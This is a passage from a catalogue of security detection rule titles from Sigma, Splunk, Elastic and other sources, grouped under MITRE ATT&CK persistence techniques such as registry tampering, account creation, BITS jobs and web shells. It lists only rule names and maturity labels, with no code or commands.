- Sigma Registry Tampering by Potentially Suspicious Processes experimental
- Splunk Remcos client registry install entry production
- Sigma Removal of Potential COM Hijacking Registry Keys test
- Sigma RestrictedAdminMode Registry Value Tampering test
- YARA-L RestrictedAdminMode Registry Value Tampering
- Sigma RestrictedAdminMode Registry Value Tampering - ProcCreation test
- Splunk Revil Registry Entry production
- Sigma Run Once Task Configuration in Registry test
- Sigma Run Once Task Execution as Configured in Registry test
- Splunk Rundll32 Shimcache Flush production
- Sigma Security Event Logging Disabled via MiniNt Registry Key - Process experimental
- Sigma Security Event Logging Disabled via MiniNt Registry Key - Registry Set experimental
- Sigma Service Binary in Suspicious Folder test
- Sigma Service Binary in User Controlled Folder test
- Elastic Service Disabled via Registry Modification production
- Elastic Service Path Modification production
- Sigma ShimCache Flush stable
- YARA-L ShimCache Flush
- Elastic SolarWinds Process Disabling Services via Registry production
- Elastic Startup or Run Key Registry Modification production
- Elastic Suspicious ImagePath Service Creation production
- Elastic Suspicious Print Spooler Point and Print DLL production
- Splunk Suspicious Reg exe Process production
- Sigma Suspicious Registry Modification From ADS Via Regini.EXE test
- Elastic Suspicious Startup Shell Folder Modification production
- Sigma Suspicious VBoxDrvInst.exe Parameters test
- Sigma Sysmon Channel Reference Deletion test
- Sigma Terminal Server Client Connection History Cleared - Registry test
- Sigma Trust Access Disable For VBApplications test
- Sigma Uncommon Microsoft Office Trusted Location Added test
- Elastic Uncommon Registry Persistence Change production
- Elastic Unusual Persistence via Services Registry production
- Sigma User Shell Folders Registry Modification via CommandLine experimental
- Sigma Wdigest CredGuard Registry Modification test
- Sigma Wdigest Enable UseLogonCredential test
- YARA-L Wdigest Enable UseLogonCredential
- Splunk WDigest Forced Credential Caching (PowerShell)
- Splunk WDigest Forced Credential Caching (Sysmon)
- Splunk WDigest Forced Credential Caching (Windows Event Log)
- Elastic Werfault ReflectDebugger Persistence production
- Splunk Windows Anomalous Registry Value Length in Environment Key production
- Splunk Windows Defender ASR Registry Modification production
- Splunk Windows Defender ASR Rule Disabled production
- Elastic Windows Defender Disabled via Registry Modification production
- Splunk Windows Deleted Registry By A Non Critical Process File Path production
- Splunk Windows Disable Change Password Through Registry production
- Splunk Windows Disable Lock Workstation Feature Through Registry production
- Splunk Windows Disable LogOff Button Through Registry production
- Splunk Windows Disable Notification Center production
- Splunk Windows Disable Shutdown Button Through Registry production
- Splunk Windows Disable Windows Group Policy Features Through Registry production
- Splunk Windows Downdate Registry Activity production
- Sigma Windows Event Log Access Tampering Via Registry experimental
- Splunk Windows Hide Notification Features Through Registry production
- Splunk Windows Impair Defenses Disable AV AutoStart via Registry production
- Splunk Windows InProcServer32 New Outlook Form production
- Splunk Windows Modify Registry AuthenticationLevelOverride production
- Splunk Windows Modify Registry Auto Minor Updates production
- Splunk Windows Modify Registry Auto Update Notif production
- Splunk Windows Modify Registry Configure BitLocker production
- Splunk Windows Modify Registry Default Icon Setting production
- Splunk Windows Modify Registry Delete Firewall Rules production
- Splunk Windows Modify Registry Disable RDP production
- Splunk Windows Modify Registry Disable Restricted Admin production
- Splunk Windows Modify Registry Disable Toast Notifications production
- Splunk Windows Modify Registry Disable Win Defender Raw Write Notif production
- Splunk Windows Modify Registry Disable WinDefender Notifications production
- Splunk Windows Modify Registry Disable Windows Security Center Notif production
- Splunk Windows Modify Registry DisableRemoteDesktopAntiAlias production
- Splunk Windows Modify Registry DisableSecuritySettings production
- Splunk Windows Modify Registry Disabling WER Settings production
- Splunk Windows Modify Registry DisAllow Windows App production
- Splunk Windows Modify Registry Do Not Connect To Win Update production
- Splunk Windows Modify Registry DontShowUI production
- Splunk Windows Modify Registry EnableLinkedConnections production
- Splunk Windows Modify Registry LongPathsEnabled production
- Splunk Windows Modify Registry MaxConnectionPerServer production
- Splunk Windows Modify Registry No Auto Reboot With Logon User production
- Splunk Windows Modify Registry No Auto Update production
- Splunk Windows Modify Registry NoChangingWallPaper production
- Splunk Windows Modify Registry on Smart Card Group Policy production
- Splunk Windows Modify Registry ProxyEnable production
- Splunk Windows Modify Registry ProxyServer production
- Splunk Windows Modify Registry Qakbot Binary Data Registry production
- Splunk Windows Modify Registry Regedit Silent Reg Import production
- Splunk Windows Modify Registry Suppress Win Defender Notif production
- Splunk Windows Modify Registry Tamper Protection production
- Splunk Windows Modify Registry to Add or Modify Firewall Rule production
- Splunk Windows Modify Registry UpdateServiceUrlAlternate production
- Splunk Windows Modify Registry USeWuServer production
- Splunk Windows Modify Registry Utilize ProgIDs production
- Splunk Windows Modify Registry ValleyRAT C2 Config production
- Splunk Windows Modify Registry ValleyRat PWN Reg Entry production
- Splunk Windows Modify Registry With MD5 Reg Key Name production
- Splunk Windows Modify Registry WuServer production
- Splunk Windows Modify Registry wuStatusServer production
- Splunk Windows Modify Show Compress Color And Info Tip Registry production
- Splunk Windows New InProcServer32 Added production
- Splunk Windows Outlook Dialogs Disabled from Unusual Process production
- Splunk Windows Outlook LoadMacroProviderOnBoot Persistence production
- Splunk Windows Outlook WebView Registry Modification production
- Splunk Windows Routing and Remote Access Service Registry Key Change production
- Splunk Windows RunMRU Registry Key or Value Deleted production
- Splunk Windows Set Network Profile Category to Private via Registry production
- Splunk Windows Snake Malware Registry Modification wav OpenWithProgIds production
- Splunk Windows SnappyBee Create Test Registry production
- Elastic Windows Subsystem for Linux Distribution Installed production
- Sigma Winlogon AllowMultipleTSSessions Enable test
External Remote Services T1133 28 rules
- Splunk Detect Exchange Web Shell production
- Splunk Disabled Pre-Authentication Accounts Discovery - PowerShell (PowerShell)
- Splunk Disabled Pre-Authentication Accounts Discovery - PowerShell (Sysmon)
- Splunk Disabled Pre-Authentication Accounts Discovery - PowerShell (Windows Event Log)
- Sigma External Remote RDP Logon from Public IP test
- Sigma External Remote SMB Logon from Public IP test
- Sigma Failed Logon From Public IP test
- Splunk MS Exchange Mailbox Replication service writing Active Server Pages experimental
- Splunk Outbound Network Connection from Java Using Default Ports production
- Sigma Potential Exploitation of GoAnywhere MFT Vulnerability experimental
- Splunk RDP Brute-force Detection (Windows Event Log)
- Splunk RDP Connection (Sysmon)
- Splunk RDP Connection (Windows Event Log)
- Splunk RDP Hijacking (Windows Event Log)
- Splunk RDP Logon_Logoff Event (Windows Event Log)
- Sigma Remote Access Tool - ScreenConnect Installation Execution test
- Sigma Remote Access Tool - Team Viewer Session Started On Windows Host test
- Sigma Running Chrome VPN Extensions via the Registry 2 VPN Extension test
- Sigma Suspicious File Created by ArcSOC.exe experimental
- Splunk Temporary ConnectWise xml File Activity (Windows Event Log)
- Sigma Unusual Child Process of dns.exe test
- Sigma Unusual File Deletion by Dns.exe test
- Sigma Unusual File Modification by dns.exe test
- Sigma User Added to Remote Desktop Users Group test
- Splunk Web or Application Server Spawning a Shell production
- Splunk Windows MOVEit Transfer Writing ASPX production
- Splunk Windows PaperCut NG Spawn Shell production
- Splunk Windows RDPClient Connection Sequence Events production
Create Account T1136 44 rules
- Kusto Account Creation available
- Sigma Computer account created with privileges experimental
- Splunk Create_Add Local_Domain User (EDR)
- Splunk Create_Add Local_Domain User (Sysmon)
- Splunk Create_Add Local_Domain User (Windows Event Log)
- Elastic Creation of a Hidden Local User Account production
- Sigma Creation of a Local Hidden User Account by Registry test
- Sigma DarkGate - User Created Via Net.EXE test
- Splunk Detect New Local Admin account production
- Elastic dMSA Account Creation by an Unusual User production
- Sigma Fortinet APT group abuse on Windows (user) experimental
- Sigma Hidden account creation (with fast deletion) experimental
- Sigma Hidden Local User Creation test
- Sigma Local User Creation test
- Sigma Manipulation of User Computer or Group Security Principals Across AD test
- Sigma New User Created Via Net.EXE test
- YARA-L New User Created Via Net.EXE
- Sigma New User Created Via Net.EXE With Never Expire Option test
- Sigma PowerShell Create Local User test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma PSEXEC Remote Execution File Artefact test
- Sigma Serv-U Exploitation CVE-2021-35211 by DEV-0322 test
- Splunk Short Lived Windows Accounts production
- Sigma Suspicious computer account created by a computer account experimental
- Sigma Suspicious Windows ANONYMOUS LOGON Local Account Created test
- Kusto Unusual identity creation using exchange powershell
- Sigma User account created by a computer account experimental
- Elastic User Account Creation production
- Sigma User account creation disguised in a computer account experimental
- Sigma User Added to Remote Desktop Users Group test
- Sigma User creation via commandline
- Sigma User enumeration and creation related to Manic Menagerie 2.0 (via cmdline)
- Splunk User_Domain Enumeration Tool - Windows (PowerShell)
- Splunk User_Domain Enumeration Tool - Windows (Sysmon)
- Splunk User_Domain Enumeration Tool - Windows (Windows Event Log)
- Splunk Windows Azure PowerShell Module Installation Via PowerShell Script production
- Splunk Windows Computer Account Changed to Domain Controller production
- Splunk Windows Create Local Account production
- Splunk Windows Create Local Administrator Account Via Net production
- Splunk Windows Entra User Management Via Azure CLI production
- Splunk Windows ESX Admins Group Creation Security Event production
- Splunk Windows ESX Admins Group Creation via Net production
- Splunk Windows ESX Admins Group Creation via PowerShell production
- Splunk Windows Privileged Group Modification production
Create Account: Local Account T1136.001 27 rules
- Splunk Create_Add Local_Domain User (EDR)
- Splunk Create_Add Local_Domain User (Sysmon)
- Splunk Create_Add Local_Domain User (Windows Event Log)
- Elastic Creation of a Hidden Local User Account production
- Sigma Creation of a Local Hidden User Account by Registry test
- Sigma DarkGate - User Created Via Net.EXE test
- Splunk Detect New Local Admin account production
- Sigma Hidden Local User Creation test
- Sigma Local User Creation test
- Sigma New User Created Via Net.EXE test
- YARA-L New User Created Via Net.EXE
- Sigma New User Created Via Net.EXE With Never Expire Option test
- Sigma PowerShell Create Local User test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma Serv-U Exploitation CVE-2021-35211 by DEV-0322 test
- Splunk Short Lived Windows Accounts production
- Sigma Suspicious Windows ANONYMOUS LOGON Local Account Created test
- Elastic User Account Creation production
- Sigma User Added to Remote Desktop Users Group test
- Sigma User creation via commandline
- Sigma User enumeration and creation related to Manic Menagerie 2.0 (via cmdline)
- Splunk Windows Create Local Account production
- Splunk Windows Create Local Administrator Account Via Net production
- Splunk Windows ESX Admins Group Creation Security Event production
- Splunk Windows ESX Admins Group Creation via Net production
- Splunk Windows ESX Admins Group Creation via PowerShell production
- Splunk Windows Privileged Group Modification production
Create Account: Domain Account T1136.002 18 rules
- Splunk Create_Add Local_Domain User (EDR)
- Splunk Create_Add Local_Domain User (Sysmon)
- Splunk Create_Add Local_Domain User (Windows Event Log)
- Elastic dMSA Account Creation by an Unusual User production
- Sigma Manipulation of User Computer or Group Security Principals Across AD test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma PSEXEC Remote Execution File Artefact test
- Sigma Suspicious Windows ANONYMOUS LOGON Local Account Created test
- Elastic User Account Creation production
- Sigma User creation via commandline
- Splunk User_Domain Enumeration Tool - Windows (PowerShell)
- Splunk User_Domain Enumeration Tool - Windows (Sysmon)
- Splunk User_Domain Enumeration Tool - Windows (Windows Event Log)
- Splunk Windows Computer Account Changed to Domain Controller production
- Splunk Windows ESX Admins Group Creation Security Event production
- Splunk Windows ESX Admins Group Creation via Net production
- Splunk Windows ESX Admins Group Creation via PowerShell production
- Splunk Windows Privileged Group Modification production
Create Account: Cloud Account T1136.003 1 rule
- Splunk Windows Azure PowerShell Module Installation Via PowerShell Script production
Office Application Startup T1137 21 rules
- Sigma Code Executed Via Office Add-in XLL File test
- Sigma IE Change Domain Zone test
- Sigma New Outlook Macro Created test
- Sigma Office Application Startup - Office Test test
- Elastic Office Test Registry Persistence production
- Elastic Outlook Home Page Registry Modification production
- Sigma Outlook Macro Execution Without Warning Setting Enabled test
- Sigma Outlook Security Settings Updated - Registry test
- Sigma Outlook Task/Note Reminder Received test
- Sigma Potential Persistence Via Excel Add-in - Registry test
- Sigma Potential Persistence Via Microsoft Office Add-In test
- Sigma Potential Persistence Via Microsoft Office Startup Folder test
- Sigma Potential Persistence Via Outlook Form test
- Sigma Potential Persistence Via Outlook LoadMacroProviderOnBoot Setting test
- Sigma Potential Persistence Via Visual Studio Tools for Office test
- Sigma Registry Modification to Hidden File Extension test
- Elastic Suspicious Execution via Microsoft Office Add-Ins production
- Sigma Suspicious Outlook Macro Created test
- Splunk Windows Outlook LoadMacroProviderOnBoot Persistence production
- Splunk Windows Outlook Macro Created by Suspicious Process production
- Splunk Windows Outlook Macro Security Modified production
Office Application Startup: Office Test T1137.002 2 rules
- Sigma Office Application Startup - Office Test test
- Elastic Office Test Registry Persistence production
Office Application Startup: Outlook Forms T1137.003 1 rule
- Sigma Potential Persistence Via Outlook Form test
Office Application Startup: Outlook Home Page T1137.004 1 rule
- Elastic Outlook Home Page Registry Modification production
Office Application Startup: Add-ins T1137.006 5 rules
- Sigma Code Executed Via Office Add-in XLL File test
- Sigma Potential Persistence Via Excel Add-in - Registry test
- Sigma Potential Persistence Via Microsoft Office Add-In test
- Sigma Potential Persistence Via Visual Studio Tools for Office test
- Elastic Suspicious Execution via Microsoft Office Add-Ins production
Software Extensions T1176 6 rules
- Elastic Browser Extension Install production
- Sigma ChromeLoader Malware Execution test
- Sigma Chromium Browser Instance Executed With Custom Extension test
- Sigma Suspicious Chromium Browser Instance Executed With Custom Extension test
- Elastic Uncommon Registry Persistence Change production
- Splunk Windows Disable Internet Explorer Addons production
Software Extensions: Browser Extensions T1176.001 4 rules
- Elastic Browser Extension Install production
- Sigma Chromium Browser Instance Executed With Custom Extension test
- Sigma Suspicious Chromium Browser Instance Executed With Custom Extension test
- Splunk Windows Disable Internet Explorer Addons production
BITS Jobs T1197 28 rules
- Sigma BITS Client BitsProxy DLL Loaded By Uncommon Process experimental
- Splunk BITS Job Persistence production
- Sigma BITS payload downloaded via commandline experimental
- Sigma BITS payload downloaded via PowerShell experimental
- Sigma BITS Transfer Job Download From Direct IP test
- Sigma BITS Transfer Job Download From File Sharing Domains test
- Sigma BITS Transfer Job Download To Potential Suspicious Folder test
- Sigma BITS Transfer Job Downloading File Potential Suspicious Extension test
- Sigma BITS Transfer Job With Uncommon Or Suspicious Remote TLD test
- Elastic Bitsadmin Activity production
- Kusto Bitsadmin Activity available
- Splunk BITSAdmin Download File production
- Splunk BITSadmin Execution (PowerShell)
- Splunk BITSadmin Execution (Sysmon)
- Splunk BITSadmin Execution (Windows Event Log)
- Splunk BitsAdmin NetCat PowerCat File Transfer (EDR)
- Splunk BitsAdmin NetCat PowerCat File Transfer (Sysmon)
- Splunk BitsAdmin NetCat PowerCat File Transfer (Windows Event Log)
- Sigma File Download Via Bitsadmin test
- Sigma File Download Via Bitsadmin To A Suspicious Target Folder test
- Sigma File With Suspicious Extension Downloaded Via Bitsadmin test
- Sigma Monitoring For Persistence Via BITS test
- Sigma New BITS Job Created Via Bitsadmin test
- Sigma New BITS Job Created Via PowerShell test
- Elastic Persistence via BITS Job Notify Cmdline production
- Splunk PowerShell Start-BitsTransfer production
- Sigma Suspicious Download From Direct IP Via Bitsadmin test
- Sigma Suspicious Download From File-Sharing Website Via Bitsadmin test
Server Software Component T1505 66 rules
- Sigma Chopper Webshell Process Pattern test
- Sigma Commvault QOperation Path Traversal Webshell Drop (CVE-2025-57790) experimental
- Splunk Detect Exchange Web Shell production
- Sigma ETW Logging/Processing Option Disabled On IIS Server test
- Sigma Exchange transport agent injection via configuration file experimental
- Sigma Exchange transport agent installation artifacts (PowerShell) experimental
- Sigma Execution From Webserver Root Folder test
- Sigma HTTP Logging Disabled On IIS Server test
- Sigma IIS Native-Code Module Command Line Installation test
- Splunk IIS Worker (W3WP) Spawn Command Line (Windows Event Log)
- Elastic Microsoft Exchange Server UM Writing Suspicious Files production
- Elastic Microsoft Exchange Worker Spawning Suspicious Processes production
- Splunk Microsoft SQL Server Suspicious Child Process - Windows (Sysmon)
- Splunk Microsoft SQL Server Suspicious Child Process - Windows (Windows Event Log)
- Splunk MS Exchange Mailbox Replication service writing Active Server Pages experimental
- Sigma MSExchange Transport Agent Installation test
- Sigma New Module Module Added To IIS Server test
- Sigma Potential CVE-2023-27363 Exploitation - HTA File Creation By FoxitPDFReader test
- Sigma Potential Suspicious Activity Using SeCEdit test
- Sigma Potential Webshell Creation On Static Website test
- Sigma Previously Installed IIS Module Was Removed test
- Elastic ScreenConnect Server Spawning Suspicious Processes production
- Splunk Shell Spawned by Web Server - Windows (Windows Event Log)
- Kusto SQL Server spawning suspicious child process
- Sigma SQL server sqlcmd utility abuse for privilege escalation experimental
- Sigma SQL Server started in single mode (command) experimental
- Sigma Suspicious ASPX File Drop by Exchange test
- Sigma Suspicious Child Process Of SQL Server test
- Sigma Suspicious File Drop by Exchange test
- Sigma Suspicious File Write to SharePoint Layouts Directory experimental
- Sigma Suspicious File Write to Webapps Root Directory experimental
- Sigma Suspicious IIS Module Registration test
- Sigma Suspicious MSExchangeMailboxReplication ASPX Write test
- Sigma Suspicious Process By Web Server Process test
- Sigma Suspicious Process Spawned by CentreStack Portal AppPool experimental
- Elastic Unusual Process For MSSQL Service Accounts production
- Sigma Webserver IIS configuration edited (SYSMON) experimental
- Sigma Webserver IIS module installed (command) experimental
- Sigma Webserver IIS module installed (command) experimental
- Sigma Webserver IIS module installed (PowerShell) experimental
- Sigma Webserver IIS module installed via GAC manipulation (PowerShell) experimental
- Sigma Webshell Detection With Command Line Keywords test
- Sigma Webshell Hacking Activity Patterns test
- Sigma Webshell Tool Reconnaissance Activity test
- Splunk Windows Disable Windows Event Logging Disable HTTP Logging production
- Splunk Windows IIS Components Add New Module production
- Splunk Windows IIS Components Module Failed to Load production
- Splunk Windows Metasploit Confluence Plugin Execution production
- Splunk Windows Potential Web Shell Creation For VMware Workspace ONE production
- Splunk Windows PowerShell Add Module to Global Assembly Cache production
- Splunk Windows PowerShell Disable HTTP Logging production
- Splunk Windows PowerShell IIS Components WebGlobalModule Usage production
- Splunk Windows Server Software Component GACUtil Install to GAC production
- Elastic Windows Server Update Service Spawning Suspicious Processes production
- Splunk Windows SharePoint Spinstall0 Webshell File Creation production
- Splunk Windows Shell or Script Execution From IIS Directory production
- Splunk Windows Shell Process from CrushFTP production
- Splunk Windows SQL Server Configuration Option Hunt production
- Splunk Windows SQL Server Critical Procedures Enabled production
- Splunk Windows SQL Server Extended Procedure DLL Loading Hunt production
- Splunk Windows SQL Server xp_cmdshell Config Change production
- Splunk Windows Sqlservr Spawning Shell production
- Splunk Windows Suspicious Child Process Spawned From WebServer production
- Splunk Windows TeamCity Payload Execution from Temp Directory production
- Splunk Windows TeamCity Plugin Installed production
- Splunk Windows WSUS Spawning Shell production
Server Software Component: SQL Stored Procedures T1505.001 12 rules
- Splunk Microsoft SQL Server Suspicious Child Process - Windows (Sysmon)
- Splunk Microsoft SQL Server Suspicious Child Process - Windows (Windows Event Log)
- Sigma Potential CVE-2023-27363 Exploitation - HTA File Creation By FoxitPDFReader test
- Kusto SQL Server spawning suspicious child process
- Sigma SQL server sqlcmd utility abuse for privilege escalation experimental
- Sigma SQL Server started in single mode (command) experimental
- Elastic Unusual Process For MSSQL Service Accounts production
- Splunk Windows SQL Server Configuration Option Hunt production
- Splunk Windows SQL Server Critical Procedures Enabled production
- Splunk Windows SQL Server Extended Procedure DLL Loading Hunt production
- Splunk Windows SQL Server xp_cmdshell Config Change production
- Splunk Windows Sqlservr Spawning Shell production
Server Software Component: Transport Agent T1505.002 3 rules
- Sigma Exchange transport agent injection via configuration file experimental
- Sigma Exchange transport agent installation artifacts (PowerShell) experimental
- Sigma MSExchange Transport Agent Installation test
Server Software Component: Web Shell T1505.003 30 rules
- Sigma Chopper Webshell Process Pattern test
- Sigma Commvault QOperation Path Traversal Webshell Drop (CVE-2025-57790) experimental
- Splunk Detect Exchange Web Shell production
- Sigma Execution From Webserver Root Folder test
- Sigma IIS Native-Code Module Command Line Installation test
- Elastic Microsoft Exchange Server UM Writing Suspicious Files production
- Elastic Microsoft Exchange Worker Spawning Suspicious Processes production
- Splunk MS Exchange Mailbox Replication service writing Active Server Pages experimental
- Sigma Potential Webshell Creation On Static Website test
- Elastic ScreenConnect Server Spawning Suspicious Processes production
- Splunk Shell Spawned by Web Server - Windows (Windows Event Log)
- Sigma Suspicious ASPX File Drop by Exchange test
- Sigma Suspicious Child Process Of SQL Server test
- Sigma Suspicious File Drop by Exchange test
- Sigma Suspicious File Write to SharePoint Layouts Directory experimental
- Sigma Suspicious File Write to Webapps Root Directory experimental
- Sigma Suspicious MSExchangeMailboxReplication ASPX Write test
- Sigma Suspicious Process By Web Server Process test
- Sigma Suspicious Process Spawned by CentreStack Portal AppPool experimental
- Sigma Webshell Detection With Command Line Keywords test
- Sigma Webshell Hacking Activity Patterns test
- Sigma Webshell Tool Reconnaissance Activity test
- Splunk Windows Metasploit Confluence Plugin Execution production
- Splunk Windows Potential Web Shell Creation For VMware Workspace ONE production
- Elastic Windows Server Update Service Spawning Suspicious Processes production
- Splunk Windows SharePoint Spinstall0 Webshell File Creation production
- Splunk Windows Suspicious Child Process Spawned From WebServer production
- Splunk Windows TeamCity Payload Execution from Temp Directory production
- Splunk Windows TeamCity Plugin Installed production
- Splunk Windows WSUS Spawning Shell production
Server Software Component: IIS Components T1505.004 20 rules
- Sigma ETW Logging/Processing Option Disabled On IIS Server test
- Sigma HTTP Logging Disabled On IIS Server test
- Splunk IIS Worker (W3WP) Spawn Command Line (Windows Event Log)
- Sigma New Module Module Added To IIS Server test
- Sigma Previously Installed IIS Module Was Removed test
- Splunk Shell Spawned by Web Server - Windows (Windows Event Log)
- Sigma Suspicious IIS Module Registration test
- Sigma Webserver IIS configuration edited (SYSMON) experimental
- Sigma Webserver IIS module installed (command) experimental
- Sigma Webserver IIS module installed (command) experimental
- Sigma Webserver IIS module installed (PowerShell) experimental
- Sigma Webserver IIS module installed via GAC manipulation (PowerShell) experimental
- Splunk Windows Disable Windows Event Logging Disable HTTP Logging production
- Splunk Windows IIS Components Add New Module production
- Splunk Windows IIS Components Module Failed to Load production
- Splunk Windows PowerShell Add Module to Global Assembly Cache production
- Splunk Windows PowerShell Disable HTTP Logging production
- Splunk Windows PowerShell IIS Components WebGlobalModule Usage production
- Splunk Windows Server Software Component GACUtil Install to GAC production
- Splunk Windows Shell or Script Execution From IIS Directory production
Server Software Component: Terminal Services DLL T1505.005 1 rule
- Sigma Potential Suspicious Activity Using SeCEdit test
Pre-OS Boot T1542 8 rules
- Sigma Potential Ransomware or Unauthorized MBR Tampering Via Bcdedit.EXE test
- Sigma UEFI Persistence Via Wpbbin - FileCreation test
- Sigma UEFI Persistence Via Wpbbin - ProcessCreation test
- Splunk Windows EFI Bootloader File Modification production
- Splunk Windows EFI Volume Mount Attempt Via Mountvol production
- Splunk Windows Registry BootExecute Modification production
- Splunk Windows Suspicious File in EFI Volume production
- Splunk Windows WinLogon with Public Network Connection production
Pre-OS Boot: System Firmware T1542.001 3 rules
- Sigma UEFI Persistence Via Wpbbin - FileCreation test
- Sigma UEFI Persistence Via Wpbbin - ProcessCreation test
- Splunk Windows Suspicious File in EFI Volume production
Pre-OS Boot: Bootkit T1542.003 3 rules
- Sigma Potential Ransomware or Unauthorized MBR Tampering Via Bcdedit.EXE test
- Splunk Windows EFI Bootloader File Modification production
- Splunk Windows WinLogon with Public Network Connection production
Create or Modify System Process T1543 135 rules
- Sigma Allow Service Access Using Security Descriptor Tampering Via Sc.EXE test
- Sigma Atomic MacOS Stealer - Persistence Indicators experimental
- Splunk Clop Ransomware Known Service Name production
- Splunk CMD Echo Pipe - Escalation production
- Sigma CobaltStrike Service Installations - Security test
- Sigma CobaltStrike Service Installations - System test
- Sigma CodeIntegrity - Blocked Driver Load With Revoked Certificate test
- Sigma CodeIntegrity - Blocked Image/Driver Load For Policy Violation test
- Kusto COM Event System Loading New DLL
- Sigma CosmicDuke Service Installation test
- Sigma Deny Service Access Using Security Descriptor Tampering Via Sc.EXE test
- Sigma Devcon Execution Disabling VMware VMCI Device experimental
- Sigma Driver Load From A Temporary Directory test
- Splunk Driver Loaded from Unusual Path - Windows (Sysmon)
- Sigma EAP service activation by Liontail framework for DLL sideloading (via command) stable
- Sigma Encoded PowerShell payload deployed via service experimental
- Splunk Impacket Lateral Movement Commandline Parameters production
- Splunk Impacket Lateral Movement smbexec CommandLine Parameters production
- Splunk Impacket Lateral Movement WMIExec Commandline Parameters production
- Sigma Impacket SMBexec service creation (registry) experimental
- Sigma Impacket SMBexec service registration (native) experimental
- Splunk Kernel Service Installed - Windows (Windows Event Log)
- Sigma KrbRelayUp Service Installation test
- Sigma LiteLLM / TeamPCP Supply Chain Attack Indicators experimental
- Splunk LLM Model File Creation production
- Sigma Malicious Driver Load test
- Sigma Malicious Driver Load By Name test
- Sigma Mimikatz driver deployed via service experimental
- Sigma Mimikatz driver registration (Reg via Sysmon) experimental
- Sigma Moriya Rootkit - System test
- Sigma Moriya Rootkit File Created test
- Elastic Network Logon Provider Registry Modification production
- Sigma New Kernel Driver Via SC.EXE test
- Sigma New PDQDeploy Service - Client Side test
- Sigma New PDQDeploy Service - Server Side test
- Sigma New Service Creation Using PowerShell test
- Sigma New Service Creation Using Sc.EXE test
- Sigma OilRig APT Activity test
- Sigma OilRig APT Registry Persistence test
- Sigma OilRig APT Schedule Task Persistence - Security test
- Sigma OilRig APT Schedule Task Persistence - System test
- Elastic Persistence via Update Orchestrator Service Hijack production
- Elastic Persistence via WMI Standard Registry Provider production
- Sigma Possible impact of 'SMOKEDHAM backdoor' with MSDTC service privilege escalation via command line production
- Splunk Possible Lateral Movement PowerShell Spawn production
- Sigma Potential CobaltStrike Service Installations - Registry test
- Sigma Potential Persistence Attempt Via Existing Service Tampering test
- Elastic Potential Privilege Escalation via Service ImagePath Modification production
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma ProcessHacker Privilege Elevation test
- Sigma PSEXEC Remote Execution File Artefact test
- Splunk PSexec Service Creation (Windows Event Log)
- Sigma PSexec service installation experimental
- Sigma PUA - Kernel Driver Utility (KDU) Execution experimental
- Sigma PUA - Process Hacker Driver Load test
- Sigma PUA - Process Hacker Execution test
- Sigma PUA - System Informer Driver Load test
- Sigma PUA - System Informer Execution test
- Splunk Randomly Generated Windows Service Name experimental
- Kusto Rare Process as a Service available
- Sigma RDP session hijack via service creation abuse experimental
- Sigma Remote Access Tool Services Have Been Installed - Security test
- Sigma Remote Access Tool Services Have Been Installed - System test
- Elastic Remote Windows Service Installed production
- Sigma Service abuse with backdoored "command failure" (Reg via command) experimental
- Sigma Service abuse with backdoored "command failure" (Reg via PowerShell) experimental
- Sigma Service abuse with backdoored "command failure" (service) experimental
- Sigma Service abuse with malicious ImagePath (Reg via PowerShell) experimental
- Sigma Service abuse with malicious ImagePath (service) experimental
- Elastic Service Command Lateral Movement production
- Elastic Service Control Spawned via Script Interpreter production
- Sigma Service creation (command) experimental
- Sigma Service creation (PowerShell) experimental
- Elastic Service Creation via Local Kerberos Authentication production
- Elastic Service DACL Modification via sc.exe production
- Sigma Service Installation in Suspicious Folder test
- Sigma Service Installation with Suspicious Folder Pattern test
- Splunk Service Installed (Windows Event Log)
- Sigma Service Installed By Unusual Client - Security test
- Sigma Service Installed By Unusual Client - System test
- Elastic Service Path Modification production
- Sigma Service permissions hijacked for privileges abuse (PowerShell) experimental
- Sigma Service permissions hijacked for privileges abuse (reg via command) experimental
- Sigma Service permissions hijacked for privileges abuse (Reg via PowerShell) experimental
- Sigma Service permissions hijacked for privileges abuse (service) experimental
- Sigma ServiceDll Hijack test
- Splunk Services LOLBAS Execution Process Spawn production
- Splunk SimpleHelp Remote Access Tool Service Installation (Windows Event Log)
- Sigma Sliver C2 Default Service Installation test
- Sigma StoneDrill Service Install test
- Kusto SUNBURST suspicious SolarWinds child processes (Normalized Process Events)
- Splunk Suspicious .sys Created - Windows (Sysmon)
- Elastic Suspicious ImagePath Service Creation production
- Sigma Suspicious New Service Creation test
- Splunk Suspicious PlistBuddy Usage experimental
- Elastic Suspicious ScreenConnect Client Child Process production
- Sigma Suspicious Service DACL Modification Via Set-Service Cmdlet test
- Sigma Suspicious Service Installation test
- Sigma Suspicious Service Installation Script test
- Sigma Suspicious Service Path Modification test
- Elastic Suspicious Service was Installed in the System production
- YARA-L Suspicious Windows Service Installation Detected
- Sigma Sysinternals PsService Execution test
- Sigma Sysinternals PsSuspend Execution test
- Elastic System Shells via Services production
- Sigma TeamPCP LiteLLM Supply Chain Attack Persistence Indicators experimental
- Kusto TEARDROP memory-only dropper available
- Sigma Turla PNG Dropper Service test
- Sigma Turla Service Install test
- Sigma Uncommon Service Installation Image Path test
- Elastic Unsigned DLL Loaded by Svchost production
- Elastic Unusual Persistence via Services Registry production
- Sigma Vulnerable Driver Load test
- Sigma Vulnerable Driver Load By Name test
- Sigma Vulnerable HackSys Extreme Vulnerable Driver Load test
- Sigma Vulnerable WinRing0 Driver Load test
- Splunk Windows Bluetooth Service Installed From Uncommon Location production
- Splunk Windows KrbRelayUp Service Creation production
- Splunk Windows Local LLM Framework Execution production
- Splunk Windows Process Execution in Temp Dir production
- Splunk Windows Remote Create Service production
- Splunk Windows Service Create Kernel Mode Driver production
- Splunk Windows Service Create RemComSvc production
- Splunk Windows Service Create with Tscon production
- Splunk Windows Service Created (Sysmon)
- Splunk Windows Service Created (Windows Event Log)
- Splunk Windows Service Creation on Remote Endpoint production
- Splunk Windows Service Initiation on Remote Endpoint production
- Elastic Windows Service Installed via an Unusual Client production
- Splunk Windows Suspicious Driver Loaded Path production
- Splunk Windows Suspicious Process File Path production
- Splunk Windows Vulnerable Driver Installed production
- Splunk Windows Vulnerable Driver Loaded production
- Splunk Wscript Or Cscript Suspicious Child Process production
- Splunk XMRIG Driver Loaded production
Create or Modify System Process: Launch Agent T1543.001 1 rule
- Splunk Suspicious PlistBuddy Usage experimental
Create or Modify System Process: Systemd Service T1543.002 2 rules
